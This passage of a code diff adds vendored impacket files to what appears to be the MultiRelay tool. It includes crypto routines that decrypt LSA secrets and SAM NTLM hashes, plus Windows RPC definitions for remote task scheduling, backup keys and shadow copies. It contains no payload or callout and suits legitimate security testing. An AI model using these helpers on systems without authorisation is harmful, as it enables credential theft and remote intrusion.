+USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGE.
+
+
+
+Smb.py and nmb.py are based on Pysmb by Michael Teo
+(https://miketeo.net/projects/pysmb/), and are distributed under the
+following license:
+
+This software is provided 'as-is', without any express or implied
+warranty.  In no event will the author be held liable for any damages
+arising from the use of this software.
+
+Permission is granted to anyone to use this software for any purpose,
+including commercial applications, and to alter it and redistribute it
+freely, subject to the following restrictions:
+
+1. The origin of this software must not be misrepresented; you must
+   not claim that you wrote the original software. If you use this
+   software in a product, an acknowledgment in the product
+   documentation would be appreciated but is not required.
+
+2. Altered source versions must be plainly marked as such, and must
+   not be misrepresented as being the original software.
+
+3. This notice cannot be removed or altered from any source
+   distribution.

tools/MultiRelay/impacket-dev/impacket/__init__.py

@@ -0,0 +1,25 @@
+# Copyright (c) 2003-2016 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+
+# Set default logging handler to avoid "No handler found" warnings.
+import logging
+try:  # Python 2.7+
+    from logging import NullHandler
+except ImportError:
+    class NullHandler(logging.Handler):
+        def emit(self, record):
+            pass
+
+# All modules inside this library MUST use this logger (impacket)
+# It is up to the library consumer to do whatever is wanted 
+# with the logger output. By default it is forwarded to the 
+# upstream logger
+
+LOG = logging.getLogger(__name__)
+LOG.addHandler(NullHandler())

tools/MultiRelay/impacket-dev/impacket/crypto.py

@@ -0,0 +1,346 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (beto@coresecurity.com)
+#
+# Description:
+#   RFC 4493 implementation (https://www.ietf.org/rfc/rfc4493.txt)
+#   RFC 4615 implementation (https://www.ietf.org/rfc/rfc4615.txt)
+#
+#   NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256 implementation
+#   (https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108)
+#
+#   [MS-LSAD] Section 5.1.2
+#   [MS-SAMR] Section 2.2.11.1.1
+
+from __future__ import division
+from __future__ import print_function
+from impacket import LOG
+try:
+    from Cryptodome.Cipher import DES, AES
+except Exception:
+    LOG.error("Warning: You don't have any crypto installed. You need pycryptodomex")
+    LOG.error("See https://pypi.org/project/pycryptodomex/")
+from struct import pack, unpack
+from impacket.structure import Structure
+import hmac, hashlib
+from six import b
+
+def Generate_Subkey(K):
+
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                    Algorithm Generate_Subkey                      +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   +   Input    : K (128-bit key)                                      +
+#   +   Output   : K1 (128-bit first subkey)                            +
+#   +              K2 (128-bit second subkey)                           +
+#   +-------------------------------------------------------------------+
+#   +                                                                   +
+#   +   Constants: const_Zero is 0x00000000000000000000000000000000     +
+#   +              const_Rb   is 0x00000000000000000000000000000087     +
+#   +   Variables: L          for output of AES-128 applied to 0^128    +
+#   +                                                                   +
+#   +   Step 1.  L := AES-128(K, const_Zero);                           +
+#   +   Step 2.  if MSB(L) is equal to 0                                +
+#   +            then    K1 := L << 1;                                  +
+#   +            else    K1 := (L << 1) XOR const_Rb;                   +
+#   +   Step 3.  if MSB(K1) is equal to 0                               +
+#   +            then    K2 := K1 << 1;                                 +
+#   +            else    K2 := (K1 << 1) XOR const_Rb;                  +
+#   +   Step 4.  return K1, K2;                                         +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+    AES_128 = AES.new(K, AES.MODE_ECB)
+
+    L = AES_128.encrypt(bytes(bytearray(16)))
+
+    LHigh = unpack('>Q',L[:8])[0]
+    LLow  = unpack('>Q',L[8:])[0]
+
+    K1High = ((LHigh << 1) | ( LLow >> 63 )) & 0xFFFFFFFFFFFFFFFF
+    K1Low  = (LLow << 1) & 0xFFFFFFFFFFFFFFFF
+
+    if (LHigh >> 63):
+        K1Low ^= 0x87
+
+    K2High = ((K1High << 1) | (K1Low >> 63)) & 0xFFFFFFFFFFFFFFFF
+    K2Low  = ((K1Low << 1)) & 0xFFFFFFFFFFFFFFFF
+
+    if (K1High >> 63):
+        K2Low ^= 0x87
+
+    K1 = bytearray(pack('>QQ', K1High, K1Low))
+    K2 = bytearray(pack('>QQ', K2High, K2Low))
+
+    return K1, K2
+
+def XOR_128(N1,N2):
+
+    J = bytearray()
+    for i in range(len(N1)):
+        #J.append(indexbytes(N1,i) ^ indexbytes(N2,i))
+        J.append(N1[i] ^ N2[i])
+    return J
+
+def PAD(N):
+    padLen = 16-len(N)
+    return  N + b'\x80' + b'\x00'*(padLen-1)
+
+def AES_CMAC(K, M, length):
+
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                   Algorithm AES-CMAC                              +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   +   Input    : K    ( 128-bit key )                                 +
+#   +            : M    ( message to be authenticated )                 +
+#   +            : len  ( length of the message in octets )             +
+#   +   Output   : T    ( message authentication code )                 +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +   Constants: const_Zero is 0x00000000000000000000000000000000     +
+#   +              const_Bsize is 16                                    +
+#   +                                                                   +
+#   +   Variables: K1, K2 for 128-bit subkeys                           +
+#   +              M_i is the i-th block (i=1..ceil(len/const_Bsize))   +
+#   +              M_last is the last block xor-ed with K1 or K2        +
+#   +              n      for number of blocks to be processed          +
+#   +              r      for number of octets of last block            +
+#   +              flag   for denoting if last block is complete or not +
+#   +                                                                   +
+#   +   Step 1.  (K1,K2) := Generate_Subkey(K);                         +
+#   +   Step 2.  n := ceil(len/const_Bsize);                            +
+#   +   Step 3.  if n = 0                                               +
+#   +            then                                                   +
+#   +                 n := 1;                                           +
+#   +                 flag := false;                                    +
+#   +            else                                                   +
+#   +                 if len mod const_Bsize is 0                       +
+#   +                 then flag := true;                                +
+#   +                 else flag := false;                               +
+#   +                                                                   +
+#   +   Step 4.  if flag is true                                        +
+#   +            then M_last := M_n XOR K1;                             +
+#   +            else M_last := padding(M_n) XOR K2;                    +
+#   +   Step 5.  X := const_Zero;                                       +
+#   +   Step 6.  for i := 1 to n-1 do                                   +
+#   +                begin                                              +
+#   +                  Y := X XOR M_i;                                  +
+#   +                  X := AES-128(K,Y);                               +
+#   +                end                                                +
+#   +            Y := M_last XOR X;                                     +
+#   +            T := AES-128(K,Y);                                     +
+#   +   Step 7.  return T;                                              +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+    const_Bsize = 16
+    const_Zero  = bytearray(16)
+
+    AES_128= AES.new(K, AES.MODE_ECB)
+    M      = bytearray(M[:length])
+    K1, K2 = Generate_Subkey(K)
+    n      = len(M)//const_Bsize
+
+    if n == 0:
+        n = 1
+        flag = False
+    else:
+        if (length % const_Bsize) == 0:
+            flag = True
+        else:
+            n += 1
+            flag = False
+
+    M_n = M[(n-1)*const_Bsize:]
+    if flag is True:
+        M_last = XOR_128(M_n,K1)
+    else:
+        M_last = XOR_128(PAD(M_n),K2)
+
+    X = const_Zero
+    for i in range(n-1):
+        M_i = M[(i)*const_Bsize:][:16]
+        Y   = XOR_128(X, M_i)
+        X   = bytearray(AES_128.encrypt(bytes(Y)))
+    Y = XOR_128(M_last, X)
+    T = AES_128.encrypt(bytes(Y))
+
+    return T
+
+def AES_CMAC_PRF_128(VK, M, VKlen, Mlen):
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                        AES-CMAC-PRF-128                           +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#   +                                                                   +
+#   + Input  : VK (Variable-length key)                                 +
+#   +        : M (Message, i.e., the input data of the PRF)             +
+#   +        : VKlen (length of VK in octets)                           +
+#   +        : len (length of M in octets)                              +
+#   + Output : PRV (128-bit Pseudo-Random Variable)                     +
+#   +                                                                   +
+#   +-------------------------------------------------------------------+
+#   + Variable: K (128-bit key for AES-CMAC)                            +
+#   +                                                                   +
+#   + Step 1.   If VKlen is equal to 16                                 +
+#   + Step 1a.  then                                                    +
+#   +               K := VK;                                            +
+#   + Step 1b.  else                                                    +
+#   +               K := AES-CMAC(0^128, VK, VKlen);                    +
+#   + Step 2.   PRV := AES-CMAC(K, M, len);                             +
+#   +           return PRV;                                             +
+#   +                                                                   +
+#   +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+    if VKlen == 16:
+        K = VK
+    else:
+        K = AES_CMAC(bytes(bytearray(16)), VK, VKlen)
+
+    PRV = AES_CMAC(K, M, Mlen)
+
+    return PRV
+
+def KDF_CounterMode(KI, Label, Context, L):
+# Implements NIST SP 800-108 Section 5.1, with PRF HMAC-SHA256
+# https://tools.ietf.org/html/draft-irtf-cfrg-kdf-uses-00#ref-SP800-108
+# Fixed values:
+#  1. h - The length of the output of the PRF in bits, and
+#  2. r - The length of the binary representation of the counter i.
+# Input: KI, Label, Context, and L.
+# Process:
+#  1. n := [L/h]
+#  2. If n > 2r-1, then indicate an error and stop.
+#  3. result(0):= empty .
+#  4. For i = 1 to n, do
+#    a. K(i) := PRF (KI, [i]2 || Label || 0x00 || Context || [L]2)
+#    b. result(i) := result(i-1) || K(i).
+#  5. Return: KO := the leftmost L bits of result(n).
+    h = 256
+    r = 32
+
+    n = L // h
+
+    if n == 0:
+        n = 1
+
+    if n > (pow(2,r)-1):
+        raise Exception("Error computing KDF_CounterMode")
+
+    result = b''
+    K      = b''
+
+    for i in range(1,n+1):
+       input = pack('>L', i) + Label + b'\x00' + Context + pack('>L',L)
+       K = hmac.new(KI, input, hashlib.sha256).digest()
+       result = result + K
+
+    return result[:(L//8)]
+
+# [MS-LSAD] Section 5.1.2 / 5.1.3
+class LSA_SECRET_XP(Structure):
+    structure = (
+        ('Length','<L=0'),
+        ('Version','<L=0'),
+        ('_Secret','_-Secret', 'self["Length"]'),
+        ('Secret', ':'),
+    )
+
+
+def transformKey(InputKey):
+    # Section 5.1.3
+    OutputKey = []
+    OutputKey.append( chr(ord(InputKey[0:1]) >> 0x01) )
+    OutputKey.append( chr(((ord(InputKey[0:1])&0x01)<<6) | (ord(InputKey[1:2])>>2)) )
+    OutputKey.append( chr(((ord(InputKey[1:2])&0x03)<<5) | (ord(InputKey[2:3])>>3)) )
+    OutputKey.append( chr(((ord(InputKey[2:3])&0x07)<<4) | (ord(InputKey[3:4])>>4)) )
+    OutputKey.append( chr(((ord(InputKey[3:4])&0x0F)<<3) | (ord(InputKey[4:5])>>5)) )
+    OutputKey.append( chr(((ord(InputKey[4:5])&0x1F)<<2) | (ord(InputKey[5:6])>>6)) )
+    OutputKey.append( chr(((ord(InputKey[5:6])&0x3F)<<1) | (ord(InputKey[6:7])>>7)) )
+    OutputKey.append( chr(ord(InputKey[6:7]) & 0x7F) )
+
+    for i in range(8):
+        OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)
+
+    return b("".join(OutputKey))
+
+def decryptSecret(key, value):
+    # [MS-LSAD] Section 5.1.2
+    plainText = b''
+    key0 = key
+    for i in range(0, len(value), 8):
+        cipherText = value[:8]
+        tmpStrKey = key0[:7]
+        tmpKey = transformKey(tmpStrKey)
+        Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
+        plainText += Crypt1.decrypt(cipherText)
+        key0 = key0[7:]
+        value = value[8:]
+        # AdvanceKey
+        if len(key0) < 7:
+            key0 = key[len(key0):]
+
+    secret = LSA_SECRET_XP(plainText)
+    return (secret['Secret'])
+
+def encryptSecret(key, value):
+    # [MS-LSAD] Section 5.1.2
+    cipherText = b''
+    key0 = key
+    value0 = pack('<LL', len(value), 1) + value
+    for i in range(0, len(value0), 8):
+        if len(value0) < 8:
+            value0 = value0 + b'\x00'*(8-len(value0))
+        plainText = value0[:8]
+        tmpStrKey = key0[:7]
+        print(type(tmpStrKey))
+        print(tmpStrKey)
+        tmpKey = transformKey(tmpStrKey)
+        Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
+        cipherText += Crypt1.encrypt(plainText)
+        key0 = key0[7:]
+        value0 = value0[8:]
+        # AdvanceKey
+        if len(key0) < 7:
+            key0 = key[len(key0):]
+
+    return cipherText
+
+def SamDecryptNTLMHash(encryptedHash, key):
+    # [MS-SAMR] Section 2.2.11.1.1
+    Block1 = encryptedHash[:8]
+    Block2 = encryptedHash[8:]
+
+    Key1 = key[:7]
+    Key1 = transformKey(Key1)
+    Key2 = key[7:14]
+    Key2 = transformKey(Key2)
+
+    Crypt1 = DES.new(Key1, DES.MODE_ECB)
+    Crypt2 = DES.new(Key2, DES.MODE_ECB)
+
+    plain1 = Crypt1.decrypt(Block1)
+    plain2 = Crypt2.decrypt(Block2)
+
+    return plain1 + plain2
+
+def SamEncryptNTLMHash(encryptedHash, key):
+    # [MS-SAMR] Section 2.2.11.1.1
+    Block1 = encryptedHash[:8]
+    Block2 = encryptedHash[8:]
+
+    Key1 = key[:7]
+    Key1 = transformKey(Key1)
+    Key2 = key[7:14]
+    Key2 = transformKey(Key2)
+
+    Crypt1 = DES.new(Key1, DES.MODE_ECB)
+    Crypt2 = DES.new(Key2, DES.MODE_ECB)
+
+    plain1 = Crypt1.encrypt(Block1)
+    plain2 = Crypt2.encrypt(Block2)
+
+    return plain1 + plain2

tools/MultiRelay/impacket-dev/impacket/dcerpc/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/atsvc.py

@@ -0,0 +1,211 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-TSCH] ATSVC Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, UCHAR, ULONG, LPDWORD, NULL
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_ATSVC  = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'TSCH SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'TSCH SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+ATSVC_HANDLE = LPWSTR
+# 2.3.1 Constant Values
+CNLEN = 15
+DNLEN = CNLEN
+UNLEN = 256
+MAX_BUFFER_SIZE = (DNLEN+UNLEN+1+1)
+
+# 2.3.7 Flags
+TASK_FLAG_INTERACTIVE                  = 0x1
+TASK_FLAG_DELETE_WHEN_DONE             = 0x2
+TASK_FLAG_DISABLED                     = 0x4
+TASK_FLAG_START_ONLY_IF_IDLE           = 0x10
+TASK_FLAG_KILL_ON_IDLE_END             = 0x20
+TASK_FLAG_DONT_START_IF_ON_BATTERIES   = 0x40
+TASK_FLAG_KILL_IF_GOING_ON_BATTERIES   = 0x80
+TASK_FLAG_RUN_ONLY_IF_DOCKED           = 0x100
+TASK_FLAG_HIDDEN                       = 0x200
+TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
+TASK_FLAG_RESTART_ON_IDLE_RESUME       = 0x800
+TASK_FLAG_SYSTEM_REQUIRED              = 0x1000
+TASK_FLAG_RUN_ONLY_IF_LOGGED_ON        = 0x2000
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.3.4 AT_INFO
+class AT_INFO(NDRSTRUCT):
+    structure =  (
+        ('JobTime',DWORD),
+        ('DaysOfMonth',DWORD),
+        ('DaysOfWeek',UCHAR),
+        ('Flags',UCHAR),
+        ('Command',LPWSTR),
+    )
+
+class LPAT_INFO(NDRPOINTER):
+    referent = (
+        ('Data',AT_INFO),
+    )
+
+# 2.3.6 AT_ENUM
+class AT_ENUM(NDRSTRUCT):
+    structure =  (
+        ('JobId',DWORD),
+        ('JobTime',DWORD),
+        ('DaysOfMonth',DWORD),
+        ('DaysOfWeek',UCHAR),
+        ('Flags',UCHAR),
+        ('Command',LPWSTR),
+    )
+
+class AT_ENUM_ARRAY(NDRUniConformantArray):
+    item = AT_ENUM
+
+class LPAT_ENUM_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',AT_ENUM_ARRAY),
+    )
+
+# 2.3.5 AT_ENUM_CONTAINER
+class AT_ENUM_CONTAINER(NDRSTRUCT):
+    structure =  (
+        ('EntriesRead',DWORD),
+        ('Buffer',LPAT_ENUM_ARRAY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.2.5.2.1 NetrJobAdd (Opnum 0)
+class NetrJobAdd(NDRCALL):
+    opnum = 0
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('pAtInfo', AT_INFO),
+    )
+
+class NetrJobAddResponse(NDRCALL):
+    structure = (
+        ('pJobId',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.2 NetrJobDel (Opnum 1)
+class NetrJobDel(NDRCALL):
+    opnum = 1
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('MinJobId', DWORD),
+        ('MaxJobId', DWORD),
+    )
+
+class NetrJobDelResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.3 NetrJobEnum (Opnum 2)
+class NetrJobEnum(NDRCALL):
+    opnum = 2
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('pEnumContainer', AT_ENUM_CONTAINER),
+        ('PreferedMaximumLength', DWORD),
+        ('pResumeHandle', DWORD),
+    )
+
+class NetrJobEnumResponse(NDRCALL):
+    structure = (
+        ('pEnumContainer', AT_ENUM_CONTAINER),
+        ('pTotalEntries', DWORD),
+        ('pResumeHandle',LPDWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.2.4 NetrJobGetInfo (Opnum 3)
+class NetrJobGetInfo(NDRCALL):
+    opnum = 3
+    structure = (
+        ('ServerName',ATSVC_HANDLE),
+        ('JobId', DWORD),
+    )
+
+class NetrJobGetInfoResponse(NDRCALL):
+    structure = (
+        ('ppAtInfo', LPAT_INFO),
+        ('ErrorCode',ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (NetrJobAdd,NetrJobAddResponse ),
+ 1 : (NetrJobDel,NetrJobDelResponse ),
+ 2 : (NetrJobEnum,NetrJobEnumResponse ),
+ 3 : (NetrJobGetInfo,NetrJobGetInfoResponse ),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hNetrJobAdd(dce, serverName = NULL, atInfo = NULL):
+    netrJobAdd = NetrJobAdd()
+    netrJobAdd['ServerName'] = serverName
+    netrJobAdd['pAtInfo'] = atInfo
+    return dce.request(netrJobAdd)
+
+def hNetrJobDel(dce, serverName = NULL, minJobId = 0, maxJobId = 0):
+    netrJobDel = NetrJobDel()
+    netrJobDel['ServerName'] = serverName
+    netrJobDel['MinJobId'] = minJobId
+    netrJobDel['MaxJobId'] = maxJobId
+    return dce.request(netrJobDel)
+
+def hNetrJobEnum(dce, serverName = NULL, pEnumContainer = NULL, preferedMaximumLength = 0xffffffff):
+    netrJobEnum = NetrJobEnum()
+    netrJobEnum['ServerName'] = serverName
+    netrJobEnum['pEnumContainer']['Buffer'] = pEnumContainer
+    netrJobEnum['PreferedMaximumLength'] = preferedMaximumLength
+    return dce.request(netrJobEnum)
+
+def hNetrJobGetInfo(dce, serverName = NULL, jobId = 0):
+    netrJobGetInfo = NetrJobGetInfo()
+    netrJobGetInfo['ServerName'] = serverName
+    netrJobGetInfo['JobId'] = jobId
+    return dce.request(netrJobGetInfo)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/bkrp.py

@@ -0,0 +1,127 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-BKRP] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+# ToDo:
+# [ ] 2.2.2 Client-Side-Wrapped Secret
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, NTSTATUS, GUID, RPC_SID, NULL
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import system_errors
+from impacket.uuid import uuidtup_to_bin, string_to_bin
+from impacket.structure import Structure
+
+MSRPC_UUID_BKRP = uuidtup_to_bin(('3dde7c30-165d-11d1-ab8f-00805f14db40', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] 
+            return 'BKRP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'BKRP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+BACKUPKEY_BACKUP_GUID = string_to_bin("7F752B10-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RESTORE_GUID_WIN2K = string_to_bin("7FE94D50-178E-11D1-AB8F-00805F14DB40")
+BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID = string_to_bin("018FF48A-EABA-40C6-8F6D-72370240E967")
+BACKUPKEY_RESTORE_GUID =  string_to_bin("47270C64-2FC7-499B-AC5B-0E37CDCE899A")
+
+################################################################################
+# STRUCTURES
+################################################################################
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', BYTE_ARRAY),
+    )
+
+# 2.2.4.1 Rc4EncryptedPayload Structure
+class Rc4EncryptedPayload(Structure):
+    structure = (
+        ('R3', '32s=""'),
+        ('MAC', '20s=""'),
+        ('SID', ':', RPC_SID),
+        ('Secret', ':'),
+    )
+
+# 2.2.4 Secret Wrapped with Symmetric Key
+class WRAPPED_SECRET(Structure):
+    structure = (
+        ('SIGNATURE', '<L=1'),
+        ('Payload_Length', '<L=0'),
+        ('Ciphertext_Length', '<L=0'),
+        ('GUID_of_Wrapping_Key', '16s=""'),
+        ('R2', '68s=""'),
+        ('_Rc4EncryptedPayload', '_-Rc4EncryptedPayload', 'self["Payload_Length"]'),
+        ('Rc4EncryptedPayload', ':'),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.1 BackuprKey(Opnum 0)
+class BackuprKey(NDRCALL):
+    opnum = 0
+    structure = (
+       ('pguidActionAgent', GUID),
+       ('pDataIn', BYTE_ARRAY),
+       ('cbDataIn', DWORD),
+       ('dwParam', DWORD),
+    )
+
+class BackuprKeyResponse(NDRCALL):
+    structure = (
+       ('ppDataOut', PBYTE_ARRAY),
+       ('pcbDataOut', DWORD),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (BackuprKey, BackuprKeyResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hBackuprKey(dce, pguidActionAgent, pDataIn, dwParam=0):
+    request = BackuprKey()
+    request['pguidActionAgent'] = pguidActionAgent
+    request['pDataIn'] = pDataIn
+    if pDataIn == NULL:
+        request['cbDataIn'] = 0
+    else:
+        request['cbDataIn'] = len(pDataIn)
+    request['dwParam'] = dwParam
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/__init__.py

@@ -0,0 +1 @@
+pass

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dcom/scmp.py

@@ -0,0 +1,337 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-SCMP]: Shadow Copy Management Protocol Interface implementation
+#              This was used as a way to test the DCOM runtime. Further 
+#              testing is needed to verify it is working as expected
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Since DCOM is like an OO RPC, instead of helper functions you will see the 
+#   classes described in the standards developed. 
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRENUM, NDRSTRUCT, NDRUNION
+from impacket.dcerpc.v5.dcomrt import PMInterfacePointer, INTERFACE, DCOMCALL, DCOMANSWER, IRemUnknown2
+from impacket.dcerpc.v5.dtypes import LONG, LONGLONG, ULONG, WSTR
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        if self.error_code in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] 
+            return 'SCMP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'SCMP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_ShadowCopyProvider = string_to_bin('0b5a2c52-3eb9-470a-96e2-6c6d4570e40f')
+IID_IVssSnapshotMgmt = string_to_bin('FA7DF749-66E7-4986-A27F-E2F04AE53772')
+IID_IVssEnumObject   = string_to_bin('AE1C7110-2F60-11d3-8A39-00C04F72D8E3')
+IID_IVssDifferentialSoftwareSnapshotMgmt = string_to_bin('214A0F28-B737-4026-B847-4F9E37D79529')
+IID_IVssEnumMgmtObject = string_to_bin('01954E6B-9254-4e6e-808C-C9E05D007696')
+IID_ShadowCopyProvider = string_to_bin('B5946137-7B9F-4925-AF80-51ABD60B20D5')
+
+# 2.2.1.1 VSS_ID
+class VSS_ID(NDRSTRUCT):
+    structure = (
+        ('Data','16s=b""'),
+    )
+
+    def getAlignment(self):
+        return 2
+
+#2.2.1.2 VSS_PWSZ
+VSS_PWSZ = WSTR
+
+# 2.2.1.3 VSS_TIMESTAMP
+VSS_TIMESTAMP = LONGLONG
+
+error_status_t = LONG
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1 VSS_OBJECT_TYPE Enumeration
+class VSS_OBJECT_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_OBJECT_UNKNOWN      = 0
+        VSS_OBJECT_NONE         = 1
+        VSS_OBJECT_SNAPSHOT_SET = 2
+        VSS_OBJECT_SNAPSHOT     = 3
+        VSS_OBJECT_PROVIDER     = 4
+        VSS_OBJECT_TYPE_COUNT   = 5
+
+# 2.2.2.2 VSS_MGMT_OBJECT_TYPE Enumeration
+class VSS_MGMT_OBJECT_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VSS_MGMT_OBJECT_UNKNOWN     = 0
+        VSS_MGMT_OBJECT_VOLUME      = 1
+        VSS_MGMT_OBJECT_DIFF_VOLUME = 2
+        VSS_MGMT_OBJECT_DIFF_AREA   = 3
+
+# 2.2.2.3 VSS_VOLUME_SNAPSHOT_ATTRIBUTES Enumeration
+class VSS_VOLUME_SNAPSHOT_ATTRIBUTES(NDRENUM):
